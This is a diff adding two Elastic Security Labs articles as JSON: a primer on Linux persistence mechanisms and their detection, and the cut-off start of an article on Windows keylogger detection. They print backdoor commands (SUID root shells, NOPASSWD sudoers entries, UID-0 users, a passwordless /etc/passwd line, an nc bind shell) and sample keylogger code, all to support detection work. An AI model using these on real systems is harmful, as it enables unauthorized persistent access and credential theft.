binaries like `find`, `vim`, or `bash`, frequently available and widely used. [GTFOBins](https://gtfobins.github.io/#+suid) provides a list of common Unix binaries that can be exploited to obtain a root shell or unauthorized file reads. System administrators must be cautious when managing SUID and SGID binaries, as improperly configured permissions can lead to significant security vulnerabilities. \n\nTo exploit this, either a misconfigured SUID or SGID binary must be present on the system, or root-level privileges must be obtained to create a backdoor. Typical privilege escalation enumeration scripts enumerate the entire filesystem for the presence of these binaries using `find`. \n\nSUID and SGID binaries are common on Linux and are available on the system by default. Generally, these cannot be exploited. An example of a misconfigured SUID binary looks like this:\n\n```\nfind / -perm -4000 -type f -exec ls -la {} \\;\n-rwsr-sr-x 1 root root 1396520 Mar 14 11:31 /bin/bash\n```\n\nThe `/bin/bash` binary is not a default SUID binary and causes a security risk. An attacker could now run `/bin/bash -p` to run bash and keep the root privileges on execution. More information on this is available at [GTFOBins](https://gtfobins.github.io/gtfobins/bash/). Although MITRE defines this as privilege escalation/defense evasion, it can (as shown) be used for persistence as well. More information by MITRE on this technique is available at [T1548.001](https://attack.mitre.org/techniques/T1548/001/).\n\n### Persistence through T1548.001 - setuid and setgid\n\nThis method requires root privileges, as it sets the SUID bit to a set of executables: \n\n```\nsudo ./panix.sh --suid --default\n[+] SUID privilege granted to /usr/bin/find\n[+] SUID privilege granted to /usr/bin/dash\n[-] python is not present on the system.\n[+] SUID privilege granted to /usr/bin/python3 \n```\n\nAfter setting SUID permissions to the binary, it can be executed in a manner that will allow the user to keep the root privileges:\n\n```\n\n/usr/bin/find . -exec /bin/sh -p \\; -quit\nwhoami\nroot\n```\n\nLooking at the events this generates, we can see a discrepancy between the user ID and real user ID:\n\n\n\nAfter executing PANIX with `sudo`, SUID permissions were granted to `/usr/bin/find`, `/usr/bin/dash`, and `/usr/bin/python3` using `chmod`. Subsequently, `/usr/bin/find` was utilized to run `/bin/sh` with privileged mode (`-p`) to obtain a root shell. Typically, the real user ID of a process matches the effective user ID. However, there are exceptions, such as when using `sudo`, `su`, or, as demonstrated here, a SUID binary, where the real user ID differs. Using our knowledge of GTFOBins and the execution chain, we can detect several indicators of SUID and SGID abuse.\n\n| Category | Coverage |\n|----------|------------------------------------|\n| Process | [SUID/SGUID Enumeration Detected](https://github.com/elastic/detection-rules/blob/main/rules/linux/discovery_suid_sguid_enumeration.toml) |\n| | [Setuid / Setgid Bit Set via chmod](https://github.com/elastic/detection-rules/blob/main/rules/linux/privilege_escalation_potential_suid_sgid_exploitation.toml) |\n| | [Privilege Escalation via SUID/SGID](https://github.com/elastic/detection-rules/blob/main/rules/cross-platform/privilege_escalation_setuid_setgid_bit_set_via_chmod.toml) |\n\n### Hunting for T1548.001 - setuid and setgid\n\nThe simplest and most effective way of hunting for SUID and SGID files is to search the filesystem for these files through OSQuery and take note of unusual ones. The [OSQuery SUID Hunting](https://github.com/elastic/detection-rules/blob/main/hunting/linux/queries/privilege_escalation_via_suid_binaries.toml) rule can help you to hunt for this technique.\n\n## T1548.003 - abuse elevation control mechanism: sudo and sudo caching (sudoers file modification)\n\nThe `sudo` command allows users to execute commands with superuser or other user privileges. The sudoers file manages [sudo permissions](https://linux.die.net/man/5/sudoers), which dictates who can use sudo and what commands they can run. The main configuration file is located at `/etc/sudoers`.\n\nThis file contains global settings and user-specific rules for sudo access. Additionally, there is a directory used to store additional sudoers configuration files at `/etc/sudoers.d/`. Each file in this directory is treated as an extension of the main sudoers file, allowing for modular and organized sudo configurations. \n\nBoth system administrators and threat actors can misconfigure the sudoers file and its extensions. A common accidental misconfiguration might be overly permissive rules that grant users more access than necessary. Conversely, a threat actor with root access can deliberately modify these files to ensure they maintain elevated access.\n\nAn example of a misconfiguration or backdoor that allows an attacker to run any command as any user without a password prompt looks like this:\n\n```\nAttacker ALL=(ALL) NOPASSWD:ALL\n```\n\nBy exploiting such misconfigurations, an attacker can maintain persistent root access. For example, with the above backdoored configuration, the attacker can gain a root shell by executing `sudo /bin/bash`. Similarly to the previous technique, this technique is also classified as privilege escalation/defense evasion by MITRE. Of course, this is again true, but it is also a way of establishing persistence. More information on T1548.003 can be found [here](https://attack.mitre.org/techniques/T1548/003/).\n\n### Persistence through T1548.003 - sudoers file modification\n\nThe `sudo -l` command can be used to list out the allowed (and forbidden) commands for the user on the current host. By default, a non-root user cannot run any commands using sudo without specifying a password. \n\n```\nsudo -l\n[sudo] password for attacker:\n```\n\nLet’s add a backdoor entry for the `attacker` user:\n\n```\nsudo ./panix.sh --sudoers --username attacker\n[+] User attacker can now run all commands without a sudo password.\n```\n\nAfter adding a backdoor in the sudoers file and rerunning the `sudo -l` command, we see that the attacker can now run any command on the system with sudo without specifying a password.\n\n```\n> sudo -l\n> User attacker may run the following commands on ubuntu-persistence-research:\n> (ALL : ALL) ALL\n> (ALL) NOPASSWD: ALL \n```\n\nAfter planting this backdoor, not much traces are left behind, other than the creation of the `/etc/sudoers.d/attacker` file.\n\n\n\nThis backdoor can also be established by adding to the `/etc/sudoers` file, which would not generate a file creation event. This event can be captured via FIM.\n\n| Category | Coverage |\n|----------|--------------------------------------------------------------|\n| File | [Sudoers File Modification](https://github.com/elastic/detection-rules/blob/main/rules/cross-platform/privilege_escalation_sudoers_file_mod.toml) |\n| | [Potential Persistence via File Modification](https://github.com/elastic/detection-rules/blob/main/rules/integrations/fim/persistence_suspicious_file_modifications.toml) |\n| Process | [Potential Privilege Escalation via Sudoers File Modification](https://github.com/elastic/detection-rules/blob/main/rules/cross-platform/privilege_escalation_echo_nopasswd_sudoers.toml) |\n\n### Hunting for T1548.003 - sudoers file modification\n\nOSQuery provides a module that displays all sudoers files and rules through a simple and effective live hunt, available at [Privilege Escalation Identification via Existing Sudoers File](https://github.com/elastic/detection-rules/blob/main/hunting/linux/queries/privilege_escalation_via_existing_sudoers.toml).\n\n## T1098/T1136 - account manipulation/creation\n\nPersistence can be established through the creation or modification of user accounts. By manipulating user credentials or permissions, attackers can ensure long-term access to a compromised system. This section covers various methods of achieving persistence through user account manipulation. MITRE divides this section into [T1098](https://attack.mitre.org/techniques/T1098/) (account manipulation) and [T1136](https://attack.mitre.org/techniques/T1136/) (create account).\n\n### T1136.001 - create account: local account\n\nCreating a new user account is a straightforward way to establish persistence. An attacker with root privileges can add a new user, ensuring they maintain access to the system even if other backdoors are removed. For example:\n\n```\nuseradd -m -s /bin/bash backdooruser\necho 'backdooruser:password' | chpasswd\n```\n\nThis creates a new user called `backdooruser` with a password of `password`.\n\n### T1098 - account manipulation: user credential modification\n\nModifying the credentials of an existing user can also provide persistent access. This might involve changing the password of a privileged user account.\n\n```\necho 'targetuser:newpassword' | chpasswd\n```\n\nThis changes the password for `targetuser` to `newpassword`.\n\n### T1098 - account manipulation: direct /etc/passwd file modification\n\nDirectly writing to the `/etc/passwd` file is another method for modifying user accounts. This approach allows attackers to manually add or modify user entries, potentially avoiding detection.\n\n```\necho \"malicioususer::0:0:root:/root:/bin/bash\" >> /etc/passwd\n```\n\nWhere `<;openssl-hash>` is a hash that can be generated through `openssl passwd \"$password\".`\n\nThe command above creates a new user `malicioususer`, adds them to the `sudo group`, and sets a password. Similarly, this attack can be performed on the `/etc/shadow` file, by replacing the hash for a user’s password with a known hash.\n\n### T1136.001 - create account: backdoor user creation\n\nA backdoor user is a user account created or modified specifically to maintain access to the system. This account often has elevated privileges and is intended to be difficult to detect. One method involves creating a user with a UID of 0, effectively making it a root-equivalent user. This approach is detailed in a blog post called [Backdoor users on Linux with uid=0](https://embracethered.com/blog/posts/2021/linux-user-uid-zero-backdoor/).\n\n```\nuseradd -ou 0 -g 0 -m -d /root -s /bin/bash backdoorroot\necho 'backdoorroot:password' | chpasswd\n```\n\nThis creates a new user `backdoorroot` with UID 0, giving it root privileges.\n\n### T1098 - account manipulation: user added to privileged group\n\nAdding an existing user to a privileged group, such as the sudo group, can elevate their permissions, allowing them to execute commands with superuser privileges.\n\n```\nusermod -aG sudo existinguser\n```\n\nThis adds `existinguser` to the sudo group.\n\n### Persistence through T1098/T1136 - account manipulation/creation\n\nAll of these techniques are trivial to execute manually, but they are also built into PANIX in case you want to analyze the logs using a binary rather than a manual action. As the events generated by these techniques are not very interesting, we will not analyze them individually. We detect all the techniques described above through a vast set of detection rules.\n\n| Category | Coverage |\n|----------|------------------------------------------------|\n| File | [Potential Persistence via File Modification](https://github.com/elastic/detection-rules/blob/main/rules/integrations/fim/persistence_suspicious_file_modifications.toml) |\n| | [Shadow File Modification](https://github.com/elastic/detection-rules/blob/main/rules/linux/persistence_user_password_change.toml) |\n| Process | [Potential Linux Backdoor User Account Creation](https://github.com/elastic/detection-rules/blob/main/rules/linux/persistence_linux_backdoor_user_creation.toml) |\n| IAM | [Linux Group Creation](https://github.com/elastic/detection-rules/blob/main/rules/linux/persistence_linux_group_creation.toml) |\n| | [Linux User Added to Privileged Group](https://github.com/elastic/detection-rules/blob/main/rules/linux/persistence_linux_user_added_to_privileged_group.toml) |\n| | [Linux User Account Creation](https://github.com/elastic/detection-rules/blob/main/rules/linux/persistence_linux_user_account_creation.toml) |\n| | [User or Group Creation/Modification](https://github.com/elastic/detection-rules/blob/main/rules/linux/persistence_user_or_group_creation_or_modification.toml) |\n\n### Hunting for T1098/T1136 - account manipulation/creation\n\nThere are many ways to hunt for these techniques. The above detection rules can be added as a timelines query to look back at a longer duration of time, the `/var/log/auth.log` (and equivalents on other Linux distributions) can be parsed and read, and OSQuery can be leveraged to read user info from a running system. The [Privilege Escalation/Persistence via User/Group Creation and/or Modification](https://github.com/elastic/detection-rules/blob/main/hunting/linux/queries/persistence_via_user_group_creation_modification.toml) hunt rule contains several OSQuery queries to hunt for these techniques.\n\n## T1098.004 - account manipulation: SSH\n\n[Secure Shell (SSH)](https://linux.die.net/man/1/ssh) is a protocol to securely access remote systems. It leverages public/private key pairs to authenticate users, providing a more secure alternative to password-based logins. The SSH keys consist of a private key, kept secure by the user, and a public key, shared with the remote system.\n\nThe default locations for user-specific SSH key files and configuration files are as follows:\n\n* `~/.ssh/id_rsa`\n* `~/.ssh/id_rsa.pub`\n* `~/.ssh/authorized_keys`\n* `/root/.ssh/id_rsa`\n* `/root/.ssh/id_rsa.pub`\n* `/root/.ssh/authorized_keys`\n\nA system-wide configuration is present in:\n\n* `/etc/ssh/`\n\nThe private key remains on the client machine, while the public key is copied to the remote server’s `authorized_keys` file. This setup allows the user to authenticate with the server without entering a password.\n\nSSH keys are used to authenticate remote login sessions via SSH and for services like Secure Copy Protocol (SCP) and Secure File Transfer Protocol (SFTP), which allow secure file transfers between machines.\n\nAn attacker can establish persistence on a compromised host by adding their public key to the `authorized_keys` file of a user with sufficient privileges. This ensures they can regain access to the system even if the user changes their password. This persistence method is stealthy as built-in shell commands can be used, which are commonly more difficult to capture as a data source. Additionally, it does not rely on creating new user accounts or modifying system binaries.\n\n### Persistence through T1098.004 - SSH modification\n\nSimilar to previously, PANIX can be used to establish persistence through SSH. It can also be tested by manually adding a new key to `~/.ssh/authorized_keys`, or by creating a new public/private key pair on the system. If you want to test these techniques, you can execute the following PANIX command to establish persistence by creating a new key:\n\n```\n./panix.sh --ssh-key --default\nSSH key generated:\nPrivate key: /home/user/.ssh/id_rsa18220\nPublic key: /home/user/.ssh/id_rsa1822.pub\n[+] SSH key persistence established.\n```\n\nUse the following PANIX command to add a new public key to the authorized_keys file:\n\n```\n./panix.sh --authorized-keys --default --key \n[+] Persistence added to /home/user/.ssh/authorized_keys\n```\n\nFor file modification events, we can leverage FIM. We have several detection rules covering this technique in place.\n\n| Category | Coverage |\n|----------|---------------------------------------------|\n| File | [Potential Persistence via File Modification](https://github.com/elastic/detection-rules/blob/main/rules/integrations/fim/persistence_suspicious_file_modifications.toml) |\n| Process | [SSH Key Generated via ssh-keygen](https://github.com/elastic/detection-rules/blob/main/rules/linux/persistence_ssh_key_generation.toml) |\n\nA note on leveraging the “Potential Persistence via File Modification” rule: due to the limitation of leveraging wildcards in FIM, the FIM configuration should be adapted to represent your environment’s public/private key and authorized_keys file locations. MITRE provides additional information on this technique in [T1098.004](https://attack.mitre.org/techniques/T1098/004/).\n\n### Hunting for T1098.004 - SSH modification\n\nThe main focuses while hunting for SSH persistence are newly added public/private keys, file changes related to the `authorized_keys` files, and configuration changes. We can leverage OSQuery to hunt for all three through the queries in the [Persistence via SSH Configurations and/or Keys](https://github.com/elastic/detection-rules/blob/main/hunting/linux/queries/persistence_via_ssh_configurations_and_keys.toml) hunt.\n\n## T1059.004 - command and scripting interpreter: bind shells\n\n[A bind shell](https://www.geeksforgeeks.org/difference-between-bind-shell-and-reverse-shell/) is a remote access tool allowing an attacker to connect to a compromised system. Unlike reverse shells, which connect back to the attacker’s machine, a bind shell listens for incoming connections on the compromised host. This allows the attacker to connect at will, gaining command execution on the target machine.\n\nA bind shell typically involves the following steps:\n\n1. Listening Socket: The compromised system opens a network socket and listens for incoming connections on a specific port.\n2. Binding the Shell: When a connection is established, the system binds a command shell (such as `/bin/bash` or `/bin/sh`) to the socket.\n3. Remote Access: The attacker connects to the bind shell using a network client (like `netcat`) and gains access to the command shell on the compromised system.\n\nAn attacker can set up a bind shell in various ways, ranging from simple one-liners to more sophisticated scripts. Here is an example of a bind shell using the traditional version of netcat:\n\n```\nnc -lvnp 9001 -e /bin/bash\n```\n\nOnce the bind shell is set up, the attacker can connect to it from their machine:\n\n```\nnc -nv 4444\n```\n\nTo maintain persistence, the bind shell must be set to start automatically upon system boot or reboot. This can be achieved through various methods we discussed earlier, such as `cron`, `Systemd,` or methods discussed in the next part of this Linux detection engineering series.\n\nMITRE does not have a specific bind/reverse-shell technique, and probably classifies bind shells as the execution technique. However, the bind shell is used for persistence in our use case. Some more information from MITRE on bind/reverse shells is available at [T1059.004](https://attack.mitre.org/techniques/T1059/004/).\n\n### Persistence through T1059.004 - bind shells\n\nDetecting bind shells through behavioral rules is inherently challenging because their behavior is typically benign and indistinguishable from legitimate processes. A bind shell opens a network socket and waits for an incoming connection, a common activity for many legitimate services. When an attacker connects, it merely results in a network connection and the initiation of a shell session, which are both normal operations on a system.\n\nDue to behavioral detection's limitations, the most reliable method for identifying bind shells is static signature detection. This approach involves scanning the file system or memory for known shellcode patterns associated with bind shells.\n\nBy leveraging static signatures, we can identify and prevent bind shells more effectively than relying solely on behavioral analysis. This approach helps detect the specific code sequences used by bind shells, regardless of their behavior, ensuring a more robust defense against this type of persistence mechanism.\n\nAs all of our signature-based detections are open-source, you can check them out by visiting our [protections-artifacts YARA repository](https://github.com/elastic/protections-artifacts/tree/main/yara/rules). If you want to analyze this method within your tooling, you can leverage PANIX to set up a bind shell and connect to it using `nc`. To do so, execute the following command:\n\n```\n./panix.sh --bind-shell --default --architecture x64\n[+] Bind shell /tmp/bd64 was created, executed and backgrounded.\n[+] The bind shell is listening on port 9001.\n[+] To interact with it from a different system, use: nc -nv 9001\n[+] Bind shell persistence established!\n```\n\n### Hunting for T1059.004 - bind shells\n\nAlthough writing solid behavioral detection rules that do not provide false positives on a regular basis is near impossible, hunting for them is not. Based on the behavior of a bind shell, we know that we can look for long running processes, listening ports and listening sockets. To do so, we can leverage OSQuery. Several hunts are available for this scenario within the [Persistence Through Reverse/Bind Shells](https://github.com/elastic/detection-rules/blob/main/hunting/linux/queries/persistence_reverse_bind_shells.toml) hunting rule.\n\n## T1059.004 - command and scripting interpreter: reverse shells\n\nReverse shells are utilized in many of the persistence techniques discussed in this article and will be further explored in upcoming parts. While specific rules for detecting reverse shells were not added to many of the techniques above, they are very relevant. To maintain consistency and ensure comprehensive coverage, the following detection and endpoint rules are included to capture these persistence mechanisms.\n\n| Category | Coverage |\n|----------|--------------------------------------------|\n| Process | [Suspicious Execution via setsid and nohup](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/linux/execution_suspicious_execution_via_setsid_and_nohup.toml) |\n| | [Suspicious Execution via a Hidden Process](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/linux/execution_suspicious_execution_via_a_hidden_process.toml) |\n| Network | [Linux Reverse Shell](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/execution_linux_reverse_shell.toml) |\n| | [Linux Reverse Shell via Child](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/execution_linux_reverse_shell_via_child.toml) |\n| | [Linux Reverse Shell via Netcat](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/execution_linux_reverse_shell_via_netcat.toml) |\n| | [Linux Reverse Shell via Suspicious Utility](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/execution_linux_reverse_shell_via_suspicious_utility.toml) |\n| | [Linux Reverse Shell via setsid and nohup](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/linux/execution_linux_reverse_shell_via_setsid_and_nohup.toml) |\n| | [Potential Meterpreter Reverse Shell](https://github.com/elastic/detection-rules/blob/main/rules/linux/execution_shell_via_meterpreter_linux.toml) |\n| | [Potential Reverse Shell via UDP](https://github.com/elastic/detection-rules/blob/main/rules/linux/execution_shell_via_udp_cli_utility_linux.toml) |\n\n## Conclusion\n\nIn this part of the “Linux Detection Engineering” series, we looked into the basics of Linux persistence. If you missed the first part of the series, which focused on detection engineering with Auditd, you can catch up [here](https://www.elastic.co/security-labs/linux-detection-engineering-with-auditd). This article explored various persistence techniques, including scheduled tasks, systemd services, shell profile modifications, XDG autostart configurations, SUID/SGID binaries, sudoers rules, user and group creations/modifications, SSH key, and authorized_key modifications, bind and reverse shells.\n\nNot only did the explanation cover how each persistence method operates, but it also provided practical demonstrations of configuring them using a straightforward tool called [PANIX](https://github.com/Aegrah/PANIX). This hands-on approach enabled you to test the coverage of these techniques using your preferred security product. Additionally, we discussed hunting strategies for each method, ranging from ES|QL aggregation queries to live hunt queries with OSQuery.\n\nWe hope you found this format helpful. In the next article, we'll explore more advanced and lesser-known persistence methods used in the wild. Until then, happy hunting!"
+ },
+ "title": "Linux Detection Engineering - A primer on persistence mechanisms",
+ "slug": "primer-on-persistence-mechanisms",
+ "subtitle": "A walkthrough on how threat actors establish persistence on Linux systems and how to hunt for these techniques.",
+ "date": "2024-08-21",
+ "description": "In this second part of the Linux Detection Engineering series, we map multiple Linux persistence mechanisms to the MITRE ATT&CK framework, explain how they work, and how to detect them.",
+ "author": [
+ {
+ "slug": "ruben-groenewoud"
+ }
+ ],
+ "image": "primer-on-persistence-mechanisms.jpg",
+ "category": [
+ {
+ "slug": "detection-science"
+ }
+ ],
+ "tags": [
+ "linux",
+ "persistence"
+ ]
+ },
+ "id": "security_labs_content-primer_on_persistence_mechanisms-md",
+ "type": "security_labs_content"
+}
diff --git a/packages/security_labs_content/kibana/security_labs_content/security_labs_content-protecting_your_devices_from_information_theft_keylogger_protection-md.json b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-protecting_your_devices_from_information_theft_keylogger_protection-md.json
new file mode 100644
index 00000000000..d2854adec49
--- /dev/null
+++ b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-protecting_your_devices_from_information_theft_keylogger_protection-md.json
@@ -0,0 +1,36 @@
+{
+ "attributes": {
+ "raw": {
+ "document": "---\ntitle: \"Protecting your devices from information theft\"\nslug: \"protecting-your-devices-from-information-theft-keylogger-protection\"\ndate: \"2024-05-30\"\nsubtitle: \"Keylogger detection using Windows API behaviors\"\ndescription: \"In this article, we will introduce the keylogger and keylogging detection features added this year to Elastic Defend (starting from version 8.12), which is responsible for endpoint protection in Elastic Security.\"\nauthor:\n- slug: asuka-nakajima\nimage: \"Security Labs Images 10.jpg\"\ncategory:\n - slug: security-operations\n - slug: security-research\n - slug: detection-science\ntags:\n - detection engineering\n - threat hunting\n - threat detection\n---\n\nIn this article, we will introduce the keylogger and keylogging detection features added this year to Elastic Defend (starting from [version 8.12](https://www.elastic.co/guide/en/security/8.12/release-notes-header-8.12.0.html#enhancements-8.12.0)), which is responsible for endpoint protection in Elastic Security. This article is also available in [Japanese](https://www.elastic.co/security-labs/protecting-your-devices-from-information-theft-keylogger-protection-jp).\n\n## Introduction\n\nStarting with Elastic Defend 8.12, we have enhanced the detection of keyloggers and malware with keylogging capabilities (such as information-stealing malware or remote access trojans, better known as RATs) on Windows by monitoring and recording the calls to representative Windows APIs used by keyloggers. This publication will focus on providing a detailed technical background of this new feature. Additionally, we will introduce the new prebuilt behavioral detection rules created in conjunction with this feature.\n\n### What is a keylogger and what are their risks?\n\nA keylogger is a type of software that monitors and records the keystrokes entered on a computer (※1). While keyloggers can be used for legitimate purposes such as user monitoring, they are frequently abused by malicious actors. Specifically, they are used to steal sensitive information such as authentication credentials, credit card details, and various confidential data entered through the keyboard. (※1: While there are hardware keyloggers that can be attached directly to a PC via USB, this article focuses on software keyloggers.)\n\nThe sensitive information obtained through keyloggers can be exploited for monetary theft or as a stepping stone for further cyber attacks. Therefore, although keylogging itself does not directly damage the computer, early detection is crucial to preventing subsequent, more invasive cyber attacks.\n\nThere are many types of malware with keylogging capabilities, particularly RATs, information stealers, and banking malware. Some well-known malware with keylogging functionality includes [Agent Tesla](https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla), [LokiBot](https://malpedia.caad.fkie.fraunhofer.de/details/apk.lokibot), and [SnakeKeylogger](https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger).\n\n### How are keystrokes stolen?\n\nNext, let's explain from a technical perspective how keyloggers function without being detected. While keyloggers can be used within various operating system environments (Windows/Linux/macOS and mobile devices), this article will focus on Windows keyloggers. Specifically, we will describe four distinct types of keyloggers that capture keystrokes using Windows APIs and functions (※2).\n\nAs a side note, the reason for explaining keylogging methods here is to deepen the understanding of the new detection features introduced in the latter half of this article. Therefore, the example code provided is for illustrative purposes only and is not intended to be executable as is (※3).\n\n(※2: Keyloggers running on Windows can be broadly divided into those installed in kernel space (OS side) and those installed in the same space as regular applications (user space). This article focuses on the latter type.)\n(※3: If a keylogger is created and misused based on the example code provided below, Elastic will not be responsible for any consequences.)\n\n 1. Polling-based keylogger\n\nThis type of keylogger polls or periodically checks the state of each key on the keyboard (whether the key is pressed) at short intervals (much shorter than one second). If a keylogger detects that a new key has been pressed since the last check, it records and saves the information of the pressed key. By repeating this process, the keylogger captures the characters entered by the user.\n\nPolling-based keyloggers are implemented using Windows APIs that check the state of key inputs, with the [```GetAsyncKeyState```](https://learn.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-getasynckeystate) API being a representative example. This API can determine whether a specific key is currently pressed and whether that key has been pressed since the last API call. Below is a simple example of a polling-based keylogger using the ```GetAsyncKeyState``` API:\n\n``` c\nwhile(true)\n{\n for (int key = 1; key <= 255; key++)\n {\n if (GetAsyncKeyState(key) & 0x01)\n {\n SaveTheKey(key, \"log.txt\");\n }\n }\n Sleep(50);\n}\n```\n\nThe method of polling (```GetAsyncKeyState```) to capture key press states is not only a well-known, classic keylogging technique, but it is also commonly used by malware today.\n\n 2. Hooking-based keylogger\n \nHooking-based keyloggers, like polling-based keyloggers, are a classic type that has been around for a long time. Let's first explain what a \"hook\" is.\n\nA hook is a mechanism that allows you to insert custom processing (custom code) into specific operations of an application. Using a hook to insert custom processing is known as \"hooking.\"\n\nWindows provides a mechanism that allows you to hook messages (events) such as key inputs to an application, and this can be utilized through the [```SetWindowsHookEx```](https://learn.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-setwindowshookexw) API. Below is a simple example of a hooking-based keylogger using the ```SetWindowsHookEx``` API:\n\n``` c\nHMODULE hHookLibrary = LoadLibraryW(L\"hook.dll\");\nFARPROC hookFunc = GetProcAddress(hHookLibrary, \"SaveTheKey\");\n\nHHOOK keyboardHook = NULL;\n \nkeyboardHook = SetWindowsHookEx(WH_KEYBOARD_LL,\n (HOOKPROC)hookFunc,\n hHookLibrary,\n 0);\n```\n\n 3. Keylogger using the Raw Input Model\n \nThis type of keylogger captures and records raw input data obtained directly from input devices like keyboards. Before delving into the details of this type of keylogger, it's essential to understand the \"Original Input Model\" and \"Raw Input Model\" in Windows. Here's an explanation of each input method:\n\n - **Original Input Model**: The data entered from input devices like keyboards is processed by the OS before being delivered to the application.\n - **Raw Input Model**: The data entered from input devices is received directly by the application without any intermediate processing by the OS.\n \nInitially, Windows only used the Original Input Model. However, with the introduction of Windows XP, the Raw Input Model was added, likely due to the increasing diversity of input devices. In the Raw Input Model, the [```RegisterRawInputDevices```](https://learn.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-registerrawinputdevices) API is used to register the input devices from which you want to receive raw data directly. Subsequently, the [```GetRawInputData```](https://learn.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-getrawinputdata) API is used to obtain the raw data.\n\nBelow is a simple example of a keylogger using the Raw Input Model and these APIs:\n\n``` c\nLRESULT CALLBACK WndProc(HWND hWnd, UINT uMessage, WPARAM wParam, LPARAM lParam)\n{\n\n UINT dwSize = 0;\n RAWINPUT* buffer = NULL;\n\n switch (uMessage)\n {\n case WM_CREATE:\n RAWINPUTDEVICE rid;\n rid.usUsagePage = 0x01; // HID_USAGE_PAGE_GENERIC\n rid.usUsage = 0x06; // HID_USAGE_GENERIC_KEYBOARD\n rid.dwFlags = RIDEV_NOLEGACY | RIDEV_INPUTSINK;\n rid.hwndTarget = hWnd;\n RegisterRawInputDevices(&rid, 1, sizeof(rid));\n break;\n case WM_INPUT:\n GetRawInputData((HRAWINPUT)lParam, RID_INPUT, NULL, &dwSize, sizeof(RAWINPUTHEADER));\n\n buffer = (RAWINPUT*)HeapAlloc(GetProcessHeap(), 0, dwSize);\n\n if (GetRawInputData((HRAWINPUT)lParam, RID_INPUT, buffer, &dwSize, sizeof(RAWINPUTHEADER)))\n {\n if (buffer->header.dwType == RIM_TYPEKEYBOARD)\n {\n SaveTheKey(buffer, \"log.txt\");\n }\n }\n HeapFree(GetProcessHeap(), 0, buffer);\n break;\n default:\n return DefWindowProc(hWnd, uMessage, wParam, lParam);\n }\n return 0;\n}\n```\n\nIn this example, ```RegisterRawInputDevices``` is used to register the input devices from which raw input data is to be received. Here, it is set to receive raw input data from the keyboard.\n\n 4. Keylogger using ```DirectInput```\n \nFinally, let's discuss a keylogger that uses ```DirectInput```. In simple terms, this keylogger abuses the functionalities of Microsoft DirectX. DirectX is a collection of APIs (libraries) used for handling multimedia tasks such as games and videos.\n\nSince obtaining various inputs from users is essential in gaming, DirectX also provides APIs for processing user inputs. The APIs provided before DirectX version 8 are known as ```DirectInput```. Below is a simple example of a keylogger using related APIs. As a side note, when acquiring key states using ```DirectInput```, the ```RegisterRawInputDevices``` API is called in the background.\n\n``` c\nLPDIRECTINPUT8\t\tlpDI = NULL;\nLPDIRECTINPUTDEVICE8\tlpKeyboard = NULL;\n\nBYTE key[256];\nZeroMemory(key, sizeof(key));\n\nDirectInput8Create(hInstance, DIRECTINPUT_VERSION, IID_IDirectInput8, (LPVOID*)&lpDI, NULL);\nlpDI->CreateDevice(GUID_SysKeyboard, &lpKeyboard, NULL);\nlpKeyboard->SetDataFormat(&c_dfDIKeyboard);\nlpKeyboard->SetCooperativeLevel(hwndMain, DISCL_FOREGROUND | DISCL_NONEXCLUSIVE | DISCL_NOWINKEY);\n\nwhile(true)\n{\n HRESULT ret = lpKeyboard->GetDeviceState(sizeof(key), key);\n if (FAILED(ret)) {\n lpKeyboard->Acquire();\n lpKeyboard->GetDeviceState(sizeof(key), key);\n }\n SaveTheKey(key, \"log.txt\");\t\n Sleep(50);\n}\n```\n\n## Detecting keyloggers by monitoring Windows API calls\n\nElastic Defend uses Event Tracing for Windows (ETW ※4) to detect the aforementioned keylogger types. This is achieved by monitoring calls to related Windows APIs and logging particularly anomalous behavior. Below are the Windows APIs being monitored and the newly created keylogger detection rules associated with these APIs. (※4: In short, ETW is a mechanism provided by Microsoft for tracing and logging the execution of applications and system components in Windows, such as device drivers.)\n\n### Monitored Windows APIs:\n\n - [GetAsyncKeyState](https://learn.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-getasynckeystate)\n - [SetWindowsHookEx](https://learn.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-setwindowshookexw)\n - [RegisterRawInputDevice](https://learn.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-registerrawinputdevices)\n\n### New keylogger endpoint detection rules:\n\n - [GetAsyncKeyState API Call from Suspicious Process](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/collection_getasynckeystate_api_call_from_suspicious_process.toml)\n - [GetAsyncKeyState API Call from Unusual Process](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/collection_getasynckeystate_api_call_from_unusual_process.toml)\n - [Keystroke Input Capture via DirectInput](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/collection_keystroke_input_capture_via_directinput.toml)\n - [Keystroke Input Capture via RegisterRawInputDevices](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/collection_keystroke_input_capture_via_registerrawinputdevices.toml)\n - [Keystroke Messages Hooking via SetWindowsHookEx](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/collection_keystroke_messages_hooking_via_setwindowshookex.toml)\n - [Keystrokes Input Capture from a Managed Application](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/collection_keystrokes_input_capture_from_a_managed_application.toml)\n - [Keystrokes Input Capture from a Suspicious Module](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/collection_keystrokes_input_capture_from_a_suspicious_module.toml)\n - [Keystrokes Input Capture from Suspicious CallStack](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/collection_keystrokes_input_capture_from_suspicious_callstack.toml)\n - [Keystrokes Input Capture from Unsigned DLL](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/collection_keystrokes_input_capture_from_unsigned_dll.toml)\n - [Keystrokes Input Capture via SetWindowsHookEx](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/collection_keystrokes_input_capture_via_setwindowshookex.toml)\n\nWith this new set of 